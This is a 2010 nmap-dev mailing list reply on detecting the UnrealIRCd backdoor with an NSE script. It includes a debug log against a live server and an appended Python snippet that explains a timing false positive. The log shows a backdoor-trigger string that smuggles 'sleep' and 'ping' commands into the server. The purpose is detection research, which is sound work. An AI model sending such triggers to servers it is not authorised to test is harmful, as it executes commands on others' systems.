Nmap Development mailing list archives
Re: Always practice safe software: a lesson from UnrealIRCd
From: David Fifield <david () bamsoftware com>
Date: Wed, 23 Jun 2010 18:38:05 -0600
On Wed, Jun 23, 2010 at 07:21:23PM -0500, Ron wrote:
> I found a better way to detect vulnerable servers, but unfortunately it isn't something an average person can do (requires a DNS authoritative server).
>
> From the original list, with a 20 second delay and 40 second timeout, on the list you provided earlier, I found:
> o 4 vulnerable servers
> o 3 were discovered
> o 1 false positive
> o 1 was missed because of 'too many reconnects'
>
> So, that isn't very good. We can make the delays even longer, and I think it'll get rather accurate, but I don't think that's ideal, either. I'm going to give mutex a shot, still.

Ah, so the timing is accurate enough, but it's not really an accurate reflection of whether the vulnerability exists. I tried using irc-unrealircd-backdoor.command to ping a server, and against all the 9- and 11-second hosts, a vulnerability was detected but I didn't receive any pings. It looks like the delay is really being caused by a lack of an auth response.

Discovered open port 6667/tcp on 91.121.137.140
NSE: Starting irc-unrealircd-backdoor against 91.121.137.140:6667.
NSOCK (0.5030s) TCP connection requested to 91.121.137.140:6667 (IOD #2) EID 16
NSOCK (0.6610s) Callback: CONNECT SUCCESS for EID 16 [91.121.137.140:6667]
NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | CONNECT
NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | AB||SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1
NSOCK (0.6700s) Write request for 50 bytes to IOD #2 EID 75 [91.121.137.140:6667]: AB||SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1.
NSOCK (0.6700s) Callback: WRITE SUCCESS for EID 75 [91.121.137.140:6667]
NSOCK (0.6900s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 106
NSOCK (0.8180s) Callback: READ SUCCESS for EID 106 [91.121.137.140:6667] (122 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Looking up your hostname...
NSOCK (0.8420s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 154
NSOCK (0.9770s) Callback: READ SUCCESS for EID 154 [91.121.137.140:6667] (100 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
NSOCK (0.9940s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 178
NSOCK (12.4170s) Callback: READ SUCCESS for EID 178 [91.121.137.140:6667] (82 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** No ident response; username prefixed with ~
NSOCK (12.4170s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 274
NSOCK (12.5740s) Callback: READ SUCCESS for EID 274 [91.121.137.140:6667] (77 bytes): :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered..
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered

David Fifield
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
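
The false positive described in the message above can be read straight off the debug log by attributing each wait to the server line that ended it. The following is an added example, not part of the original message or of the Nmap script; the function names, the list of benign notices and the 8-second default threshold (taken from the sleep value visible in the log) are assumptions.

```python
import re

# Callback and receive lines copied from the debug log in the message above.
LOG = """\
NSOCK (0.6700s) Callback: WRITE SUCCESS for EID 75 [91.121.137.140:6667]
NSOCK (0.8180s) Callback: READ SUCCESS for EID 106 [91.121.137.140:6667] (122 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Looking up your hostname...
NSOCK (0.9770s) Callback: READ SUCCESS for EID 154 [91.121.137.140:6667] (100 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
NSOCK (12.4170s) Callback: READ SUCCESS for EID 178 [91.121.137.140:6667] (82 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** No ident response; username prefixed with ~
NSOCK (12.5740s) Callback: READ SUCCESS for EID 274 [91.121.137.140:6667] (77 bytes)
NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered
"""

CALLBACK = re.compile(r"^NSOCK \((\d+\.\d+)s\) Callback: (WRITE|READ) SUCCESS")
RECEIVED = re.compile(r"^NSE: TCP \S+ < \S+ \| (.*)$")
# Server notices that account for a pause on their own (assumed list, extend as needed).
BENIGN_WAITS = ("No ident response", "Couldn't resolve your hostname")

def read_gaps(log):
    """Return [(seconds_waited, server_line)] for each line the server sent."""
    gaps, prev, pending = [], None, None
    for line in log.splitlines():
        m = CALLBACK.match(line)
        if m:
            t = float(m.group(1))
            if m.group(2) == "READ" and prev is not None:
                pending = round(t - prev, 3)  # time since the previous callback
            prev = t
            continue
        m = RECEIVED.match(line)
        if m and pending is not None:
            gaps.append((pending, m.group(1)))
            pending = None
    return gaps

def classify(log, threshold=8.0):
    """Say whether the longest wait is explained by a server-side lookup timeout."""
    gaps = read_gaps(log)
    if not gaps:
        return ("no-data", 0.0)
    wait, line = max(gaps)
    if wait < threshold:
        return ("no-delay", wait)
    if any(text in line for text in BENIGN_WAITS):
        return ("delay-explained-by-lookup", wait)
    return ("delay-unexplained", wait)
```

On this log the only wait above the threshold ends with the "No ident response" notice, while the 451 reply follows within a fraction of a second, so elapsed time alone does not separate the two causes.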